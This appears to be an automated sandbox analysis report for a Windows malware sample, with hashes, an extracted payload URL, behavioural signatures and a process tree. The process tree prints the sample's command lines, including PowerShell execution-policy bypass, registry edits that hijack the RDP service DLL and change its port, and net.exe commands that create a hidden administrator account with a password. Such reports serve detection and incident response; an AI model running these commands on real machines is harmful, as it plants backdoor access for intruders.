Analysis
- max time kernel: 125s
- max time network: 124s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 12-11-2020 14:16
Static task: static1
Behavioral task: behavioral1
  Sample: 689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: 689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe
  Resource: win10v20201028
General
- Target: 689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe
- Size: 3.4MB
- MD5: a8d7894060ed9e3a80de995fcbf81864
- SHA1: 8ed59a83db92328d05ec05af58f2b4e259be3af4
- SHA256: 689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98
- SHA512: 5e66992066cf9e0a698cf1271068a5c73aa0f8769b4b712317e528b8da83ca1780a730e72e19c4c20358b351e44692bfb6a957a0e782873063597baa3d97fa59
Malware Config
Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 9 IoCs
Processes:
flow | pid | process
20 | 4072 | powershell.exe
22 | 4072 | powershell.exe
23 | 4072 | powershell.exe
24 | 4072 | powershell.exe
26 | 4072 | powershell.exe
28 | 4072 | powershell.exe
30 | 4072 | powershell.exe
32 | 4072 | powershell.exe
34 | 4072 | powershell.exe
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource | yara_rule
\Windows\Branding\mediasrv.png | upx
\Windows\Branding\mediasvc.png | upx
-
Deletes itself 1 IoCs
Processes:
pid | process
3156 | powershell.exe
-
Loads dropped DLL 2 IoCs
Processes:
pid | process
2244 | 2244
-
Modifies service 2 TTPs 2 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters | reg.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" | reg.exe
-
Drops file in Program Files directory 4 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT | powershell.exe
File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI | powershell.exe
File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT | powershell.exe
File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI | powershell.exe
-
Drops file in Windows directory 19 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\branding\mediasrv.png | powershell.exe
File created | C:\Windows\branding\mediasrv.png | powershell.exe
File created | C:\Windows\branding\mediasvc.png | powershell.exe
File created | C:\Windows\branding\wupsvc.jpg | powershell.exe
File opened for modification | C:\Windows\branding\ShellBrd | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_uw1kamk1.zal.ps1 | powershell.exe
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | powershell.exe
File created | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI2DA8.tmp | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI2E94.tmp | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI2ED3.tmp | powershell.exe
File opened for modification | C:\Windows\branding\Basebrd | powershell.exe
File opened for modification | C:\Windows\branding\mediasvc.png | powershell.exe
File opened for modification | C:\Windows\branding\wupsvc.jpg | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_px2vwxh5.fir.psm1 | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI2EF3.tmp | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI2F04.tmp | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
-
Modifies data under HKEY_USERS 217 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0 | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," | powershell.exe
Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," | powershell.exe
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description | flow | ioc
HTTP User-Agent header | 22 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 24 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
pid | process
3156 | powershell.exe
3156 | powershell.exe
3156 | powershell.exe
3156 | powershell.exe
3156 | powershell.exe
3156 | powershell.exe
4072 | powershell.exe
4072 | powershell.exe
4072 | powershell.exe
-
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid | process
616 | 616
-
Suspicious use of AdjustPrivilegeToken 77 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 3156 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 3156 | powershell.exe
Token: SeSecurityPrivilege | 3156 | powershell.exe
Token: SeTakeOwnershipPrivilege | 3156 | powershell.exe
Token: SeLoadDriverPrivilege | 3156 | powershell.exe
Token: SeSystemProfilePrivilege | 3156 | powershell.exe
Token: SeSystemtimePrivilege | 3156 | powershell.exe
Token: SeProfSingleProcessPrivilege | 3156 | powershell.exe
Token: SeIncBasePriorityPrivilege | 3156 | powershell.exe
Token: SeCreatePagefilePrivilege | 3156 | powershell.exe
Token: SeBackupPrivilege | 3156 | powershell.exe
Token: SeRestorePrivilege | 3156 | powershell.exe
Token: SeShutdownPrivilege | 3156 | powershell.exe
Token: SeDebugPrivilege | 3156 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 3156 | powershell.exe
Token: SeRemoteShutdownPrivilege | 3156 | powershell.exe
Token: SeUndockPrivilege | 3156 | powershell.exe
Token: SeManageVolumePrivilege | 3156 | powershell.exe
Token: 33 | 3156 | powershell.exe
Token: 34 | 3156 | powershell.exe
Token: 35 | 3156 | powershell.exe
Token: 36 | 3156 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 3156 | powershell.exe
Token: SeSecurityPrivilege | 3156 | powershell.exe
Token: SeTakeOwnershipPrivilege | 3156 | powershell.exe
Token: SeLoadDriverPrivilege | 3156 | powershell.exe
Token: SeSystemProfilePrivilege | 3156 | powershell.exe
Token: SeSystemtimePrivilege | 3156 | powershell.exe
Token: SeProfSingleProcessPrivilege | 3156 | powershell.exe
Token: SeIncBasePriorityPrivilege | 3156 | powershell.exe
Token: SeCreatePagefilePrivilege | 3156 | powershell.exe
Token: SeBackupPrivilege | 3156 | powershell.exe
Token: SeRestorePrivilege | 3156 | powershell.exe
Token: SeShutdownPrivilege | 3156 | powershell.exe
Token: SeDebugPrivilege | 3156 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 3156 | powershell.exe
Token: SeRemoteShutdownPrivilege | 3156 | powershell.exe
Token: SeUndockPrivilege | 3156 | powershell.exe
Token: SeManageVolumePrivilege | 3156 | powershell.exe
Token: 33 | 3156 | powershell.exe
Token: 34 | 3156 | powershell.exe
Token: 35 | 3156 | powershell.exe
Token: 36 | 3156 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 3156 | powershell.exe
Token: SeSecurityPrivilege | 3156 | powershell.exe
Token: SeTakeOwnershipPrivilege | 3156 | powershell.exe
Token: SeLoadDriverPrivilege | 3156 | powershell.exe
Token: SeSystemProfilePrivilege | 3156 | powershell.exe
Token: SeSystemtimePrivilege | 3156 | powershell.exe
Token: SeProfSingleProcessPrivilege | 3156 | powershell.exe
Token: SeIncBasePriorityPrivilege | 3156 | powershell.exe
Token: SeCreatePagefilePrivilege | 3156 | powershell.exe
Token: SeBackupPrivilege | 3156 | powershell.exe
Token: SeRestorePrivilege | 3156 | powershell.exe
Token: SeShutdownPrivilege | 3156 | powershell.exe
Token: SeDebugPrivilege | 3156 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 3156 | powershell.exe
Token: SeRemoteShutdownPrivilege | 3156 | powershell.exe
Token: SeUndockPrivilege | 3156 | powershell.exe
Token: SeManageVolumePrivilege | 3156 | powershell.exe
Token: 33 | 3156 | powershell.exe
Token: 34 | 3156 | powershell.exe
Token: 35 | 3156 | powershell.exe
Token: 36 | 3156 | powershell.exe
-
Suspicious use of WriteProcessMemory 68 IoCs
Processes:
description | pid | process | target process
PID 984 wrote to memory of 3156 | 984 | 689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe | powershell.exe
PID 984 wrote to memory of 3156 | 984 | 689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe | powershell.exe
PID 3156 wrote to memory of 2424 | 3156 | powershell.exe | csc.exe
PID 3156 wrote to memory of 2424 | 3156 | powershell.exe | csc.exe
PID 2424 wrote to memory of 4088 | 2424 | csc.exe | cvtres.exe
PID 2424 wrote to memory of 4088 | 2424 | csc.exe | cvtres.exe
PID 3156 wrote to memory of 3808 | 3156 | powershell.exe | reg.exe
PID 3156 wrote to memory of 3808 | 3156 | powershell.exe | reg.exe
PID 3156 wrote to memory of 3984 | 3156 | powershell.exe | reg.exe
PID 3156 wrote to memory of 3984 | 3156 | powershell.exe | reg.exe
PID 3156 wrote to memory of 1416 | 3156 | powershell.exe | reg.exe
PID 3156 wrote to memory of 1416 | 3156 | powershell.exe | reg.exe
PID 3156 wrote to memory of 2152 | 3156 | powershell.exe | net.exe
PID 3156 wrote to memory of 2152 | 3156 | powershell.exe | net.exe
PID 2152 wrote to memory of 2148 | 2152 | net.exe | net1.exe
PID 2152 wrote to memory of 2148 | 2152 | net.exe | net1.exe
PID 3156 wrote to memory of 1592 | 3156 | powershell.exe | cmd.exe
PID 3156 wrote to memory of 1592 | 3156 | powershell.exe | cmd.exe
PID 1592 wrote to memory of 3076 | 1592 | cmd.exe | cmd.exe
PID 1592 wrote to memory of 3076 | 1592 | cmd.exe | cmd.exe
PID 3076 wrote to memory of 3796 | 3076 | cmd.exe | net.exe
PID 3076 wrote to memory of 3796 | 3076 | cmd.exe | net.exe
PID 3796 wrote to memory of 3500 | 3796 | net.exe | net1.exe
PID 3796 wrote to memory of 3500 | 3796 | net.exe | net1.exe
PID 3156 wrote to memory of 2284 | 3156 | powershell.exe | cmd.exe
PID 3156 wrote to memory of 2284 | 3156 | powershell.exe | cmd.exe
PID 2284 wrote to memory of 896 | 2284 | cmd.exe | cmd.exe
PID 2284 wrote to memory of 896 | 2284 | cmd.exe | cmd.exe
PID 896 wrote to memory of 928 | 896 | cmd.exe | net.exe
PID 896 wrote to memory of 928 | 896 | cmd.exe | net.exe
PID 928 wrote to memory of 1332 | 928 | net.exe | net1.exe
PID 928 wrote to memory of 1332 | 928 | net.exe | net1.exe
PID 476 wrote to memory of 3996 | 476 | cmd.exe | net.exe
PID 476 wrote to memory of 3996 | 476 | cmd.exe | net.exe
PID 3996 wrote to memory of 212 | 3996 | net.exe | net1.exe
PID 3996 wrote to memory of 212 | 3996 | net.exe | net1.exe
PID 2124 wrote to memory of 1728 | 2124 | cmd.exe | net.exe
PID 2124 wrote to memory of 1728 | 2124 | cmd.exe | net.exe
PID 1728 wrote to memory of 3116 | 1728 | net.exe | net1.exe
PID 1728 wrote to memory of 3116 | 1728 | net.exe | net1.exe
PID 1036 wrote to memory of 3924 | 1036 | cmd.exe | net.exe
PID 1036 wrote to memory of 3924 | 1036 | cmd.exe | net.exe
PID 3924 wrote to memory of 2200 | 3924 | net.exe | net1.exe
PID 3924 wrote to memory of 2200 | 3924 | net.exe | net1.exe
PID 1752 wrote to memory of 3512 | 1752 | cmd.exe | net.exe
PID 1752 wrote to memory of 3512 | 1752 | cmd.exe | net.exe
PID 3512 wrote to memory of 3944 | 3512 | net.exe | net1.exe
PID 3512 wrote to memory of 3944 | 3512 | net.exe | net1.exe
PID 3796 wrote to memory of 3296 | 3796 | cmd.exe | net.exe
PID 3796 wrote to memory of 3296 | 3796 | cmd.exe | net.exe
PID 3296 wrote to memory of 2560 | 3296 | net.exe | net1.exe
PID 3296 wrote to memory of 2560 | 3296 | net.exe | net1.exe
PID 1960 wrote to memory of 4032 | 1960 | cmd.exe | net.exe
PID 1960 wrote to memory of 4032 | 1960 | cmd.exe | net.exe
PID 4032 wrote to memory of 3776 | 4032 | net.exe | net1.exe
PID 4032 wrote to memory of 3776 | 4032 | net.exe | net1.exe
PID 812 wrote to memory of 1440 | 812 | cmd.exe | WMIC.exe
PID 812 wrote to memory of 1440 | 812 | cmd.exe | WMIC.exe
PID 3820 wrote to memory of 512 | 3820 | cmd.exe | WMIC.exe
PID 3820 wrote to memory of 512 | 3820 | cmd.exe | WMIC.exe
PID 2312 wrote to memory of 2152 | 2312 | cmd.exe | cmd.exe
PID 2312 wrote to memory of 2152 | 2312 | cmd.exe | cmd.exe
PID 2152 wrote to memory of 4072 | 2152 | cmd.exe | powershell.exe
PID 2152 wrote to memory of 4072 | 2152 | cmd.exe | powershell.exe
Processes
- [1] C:\Users\Admin\AppData\Local\Temp\689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe"
  - Suspicious use of WriteProcessMemory
  - [2] \??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
    - Deletes itself
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hvjt0zup\hvjt0zup.cmdline"
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESABE5.tmp" "c:\Users\Admin\AppData\Local\Temp\hvjt0zup\CSC6AEF796A864D438BCECA6AB8CF2FC.TMP"
    - [3] C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    - [3] C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      - Modifies service
      - Modifies registry key
    - [3] C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    - [3] C:\Windows\system32\net.exe
      Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    - [3] C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\cmd.exe
        Command line: cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory
        - [5] C:\Windows\system32\net.exe
          Command line: net start rdpdr
          - Suspicious use of WriteProcessMemory
          - [6] C:\Windows\system32\net1.exe
            Command line: C:\Windows\system32\net1 start rdpdr
    - [3] C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\cmd.exe
        Command line: cmd /c net start TermService
        - Suspicious use of WriteProcessMemory
        - [5] C:\Windows\system32\net.exe
          Command line: net start TermService
          - Suspicious use of WriteProcessMemory
          - [6] C:\Windows\system32\net1.exe
            Command line: C:\Windows\system32\net1 start TermService
    - [3] C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    - [3] C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user updwin Ghasar4f5 /del
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command line: net.exe user updwin Ghasar4f5 /del
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user updwin Ghasar4f5 /del
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user updwin a7ZkH15H /add
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command line: net.exe user updwin a7ZkH15H /add
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user updwin a7ZkH15H /add
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Administrators" updwin /ADD
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Administrators" updwin /ADD
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user updwin a7ZkH15H
  - Suspicious use of WriteProcessMemory
